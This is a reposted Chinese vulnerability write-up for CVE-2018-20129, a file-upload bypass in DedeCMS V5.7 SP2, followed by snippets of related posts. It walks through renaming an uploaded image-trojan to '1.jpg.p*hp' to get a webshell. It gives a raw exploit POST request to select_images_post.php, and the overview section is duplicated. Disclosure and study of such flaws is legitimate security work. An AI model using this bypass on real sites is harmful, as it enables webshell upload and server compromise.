2. 程式人生 > >CVE-2018-20129:DedeCMS V5.7 SP2前臺檔案上傳漏洞

CVE-2018-20129:DedeCMS V5.7 SP2前臺檔案上傳漏洞

阿新 發佈:2018-12-20

一、漏洞摘要

漏洞名稱: DedeCMS V5.7 SP2前臺檔案上傳漏洞
上報日期: 2018-12-11
漏洞發現者: 陳燦華
產品首頁: http://www.dedecms.com/
軟體連結: http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz
版本: DedeCMS V5.7 SP2正式版
CVE編號: CVE-2018-20129

 

二、漏洞概述

下載最新版本的dedecms原始碼,在本地安裝完成後,開啟會員登入功能,然後登入會員中心,來到如下介面,即訪問連結:

http://192.168.174.129/dedecms/uploads/member/content_list.php?channelid=1

 

二、漏洞概述

下載最新版本的dedecms原始碼,在本地安裝完成後,開啟會員登入功能,然後登入會員中心,來到如下介面,即訪問連結:http://192.168.174.129/dedecms/uploads/member/content_list.php?channelid=1

4

在點選編輯器中的圖片:

再點選上傳按鈕:

選擇一張圖片馬檔案,再點選上傳到伺服器上,抓包:將1.jpg改為1.jpg.p*hp即可繞過限制成功上傳

上傳成功後的檔名和檔案位置如下:

使用菜刀訪問,直接getshell



三、利用程式碼

exp程式碼如下:

POST /dedecms/uploads/include/dialog/select_images_post.php?CKEditor=body&CKEditorFuncNum=2&langCode=zh-cn HTTP/1.1
Host: 192.168.174.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.174.129/dedecms/uploads/member/article_add.php
Content-Type: multipart/form-data; boundary=---------------------------69781754626668
Content-Length: 11741
Cookie: DedeUserID=1; DedeUserID__ckMd5=c7ed3d18d15d23d0; DedeLoginTime=1544372582; DedeLoginTime__ckMd5=35d444f1976a147b; PHPSESSID=c84e97f6e66b4fd99b30f1dad1e02854; last_vtime=1544372941; last_vtime__ckMd5=22714ecc90820efa; last_vid=admin; last_vid__ckMd5=5c4160178ad81aa0; ENV_GOBACK_URL=%2Fdedecms%2Fuploads%2Fmember%2Fcontent_list.php%3Fchannelid%3D1
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------69781754626668
Content-Disposition: form-data; name="upload"; filename="1.jpg.p*hp"
Content-Type: image/jpeg

 

四、參考資訊

CVE中文申請網:http://www.iwantacve.cn/index.php/archives/88/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20129
exploit-db:釋出中

相關推薦

CVE-2018-20129DedeCMS V5.7 SP2前臺檔案漏洞

一、漏洞摘要 漏洞名稱: DedeCMS V5.7 SP2前臺檔案上傳漏洞上報日期: 2018-12-11漏洞發現者: 陳燦華產品首頁: http://www.dedecms.com/軟體連結: http://updatenew.dedecms.com/base-v57/packa

CVE-2018-20129DedeCMS V5.7 SP2前臺文件漏洞

oba sid img name multi def close -a 代碼 一、漏洞摘要 漏洞名稱: DedeCMS V5.7 SP2前臺文件上傳漏洞上報日期: 2018-12-11漏洞發現者: 陳燦華產品首頁: http://www.dedecms.com/軟件鏈接:

CVE-2018-20129-——DedeCMS V5.7 SP2前臺檔案漏洞

0x01 漏洞概述 Desdev DedeCMS(織夢內容管理系統)是中國卓卓網路(Desdev)科技有限公司的一套開源的集內容釋出、編輯、管理檢索等於一體的PHP網站內容管理系統(CMS)。 Desdev DedeCMS 5.7 SP2版本中的uploads/include/dial

DedeCMS V5.7 SP2前臺檔案漏洞(CVE-2018-20129)

DedeCMS V5.7 SP2前臺檔案上傳漏洞(CVE-2018-20129) 一、漏洞描述 織夢內容管理系統(Dedecms)是一款PHP開源網站管理系統。Dedecms V5.7 SP2版本中的uploads/include/dialog/select_images_post.php檔案存在檔案上傳漏洞

dedecms v5.7 sp2前臺任意使用者登入(包括管理員)

dedecms v5.7 sp2前臺任意使用者登入(包括管理員) 前言 我們繼續來說一下dedecms最新的幾個漏洞,今天是一個前臺任意使用者登入的漏洞,該漏洞結合上一次提到的前臺任意密碼修改漏洞可以直接修改管理員的密碼,剩下的就是找後臺了,廢話不多說,我們開始吧 漏洞版本

dedecms V5.7 SP2 web後臺getshell

1後臺getshell https://www.freebuf.com/vuls/164035.html https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS V5.7 SP2後臺存在程式碼執行漏洞 ded

CVE-2018-7900華為部分型號路由器曝資訊洩露漏洞

網路安全公司NewSkySecurity的首席研究員Ankit Anubhav發現,華為部分型號路由器存在一個安全漏洞。攻擊者可以利用這個漏洞,在不連線裝置的情況下,判定裝置是否使用的是預設憑證。 這個漏洞(CVE-2018-7900)位於路由器管理面板中,存在洩露路由器憑證資訊的風險。具體來說

WebLogic 任意文件 遠程代碼執行漏洞CVE-2018-2894)------->>>任意文件檢測POC

htm input ade print out vcg exc ops 上傳 前言: Oracle官方發布了7月份的關鍵補丁更新CPU(Critical Patch Update),其中針對可造成遠程代碼執行的高危漏洞 CVE-2018-2894 進行修復: http:

WebLogic任意檔案漏洞(CVE-2018-2894)利用復現

環境搭建 參照: https://blog.csdn.net/qq_29647709/article/details/84892582 登入系統 環境啟動後,訪問http://192.1658.1.15:7001/console,即可看到後臺登入頁面。 登入後臺頁面,點選base_

weblogic系列漏洞整理————8、WebLogic 兩處任意檔案漏洞動態分析(CVE-2018-2894)

0x01 前言 CNCERT前幾天發公告稱發現Oracle公司出品的基於JavaEE結構的中介軟體WebLogic產品存在一個遠端上傳漏洞,並得到了廠商的確認,危害程度評分高達9.8分。鑑於廠商已進行了安全修復,筆者對該漏洞進行了一次分析。WebLogic管理端未授權的

phpcms v9.6.0任意檔案漏洞(CVE-2018-14399)

phpcms v9.6.0任意檔案上傳漏洞(CVE-2018-14399) 一、漏洞描述 PHPCMS 9.6.0版本中的libs/classes/attachment.class.php檔案存在漏洞,該漏洞源於PHPCMS程式在下載遠端/本地檔案時沒有對檔案的型別做正確的校驗。遠端攻擊者可以利用該漏洞上傳並

360眾測考試,weblogic題(CVE-2018-2894)檔案漏洞

0x01 漏洞簡介 Weblogic管理端未授權的兩個頁面存在任意上傳jsp檔案漏洞,進而獲取伺服器許可權。Oracle 7月更新中,修復了Weblogic Web Service Test Page中一處任意檔案上傳漏洞,Web Service Test Page 在 ‘生產模式’

17.[CVE-2017-12615]Tomcat任意檔案漏洞

【CVE-2017-12615】 Tomcat任意檔案上傳漏洞 首先先貼出wooyun上的一個案例:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html 看到這個漏洞讓我想到了IIS6.0任意檔案上傳的漏洞,不過現在大多都用工具,比如I

實際應用二基於Apache common fileupload的檔案

第一步:編輯前臺頁面 主要以表單形式提交,後面會將ajax提交其實他也是封裝成表單資料 <form method="POST" enctype="multipart/form-data" action="fileupload">       &nbs

PHP任意檔案漏洞CVE-2015-2348)

安全研究人員今天釋出了一箇中危漏洞——PHP任意檔案上傳漏洞(CVE-2015-2348)。 在上傳檔案的時候只判斷檔名是合法的檔名就斷定這個檔案不是惡意檔案,這確實會導致其他安全問題。並且在這種情況下,在你自己的檔案中檢查漏洞很不現實,因為這個漏洞可以繞過你對檔名字尾、檔案型別(Content-Typ

CVE-2015-2348(PHP任意檔案漏洞

漏洞編號:CVE-2015-2348漏洞影響版本:PHP 5.4.38~5.6.6漏洞成因:        通常情況下,PHP的開發者會對檔案使用者上傳的檔案的型別、檔案大小、檔名字尾等進行嚴格的檢查來限制惡意的PHP指令碼檔案的上傳漏洞的產生,但是攻擊者有時候可以結合語言的

Tomcat任意檔案漏洞CVE-2017-12615復現測試

今天爆出了一個tomcat7的任意檔案上傳漏洞,看了大牛們的分析後,我自己本地搭建環境複測。 漏洞影響的tomcat版本為tomcat7.0.0-7.0.81版本 我本地下載的是tomcat7.0.5

MVC5使用Ajax和HTML5實現檔案功能

引言在實際程式設計中,經常遇到實現檔案上傳並顯示上傳進度的功能,基於此目的,本文就為大家介紹不使用flash 或任何上傳檔案的外掛來實現帶有進度顯示的檔案上傳功能。基本功能:實現帶有進度條的檔案上傳功能高階功能:通過拖拽檔案的操作實現多個檔案上傳功能背景HTML5提供了一種標

織夢DedeCms任意檔案漏洞修復

一、/include/dialog/select_soft_post.php檔案,搜尋(大概在72行的樣子)      $fullfilename = $cfg_basedir.$activepath.'/'.$filename;      修改為      if (preg

程式碼審計| DEDECMS -V5.7-UTF8-SP2-20180109漏洞集合

最近dedeCMS爆了好多洞(0day),於是將最近的漏洞進行復現和整理便成為了本篇漏洞集合。 最近dedeCMS爆了好多洞(0day),於是將最近的漏洞進行復現和整理便成為了本篇漏洞集合。期待師傅們的指導與交流。 cookie偽造導致任意前臺使用者登入 0×00 相關環境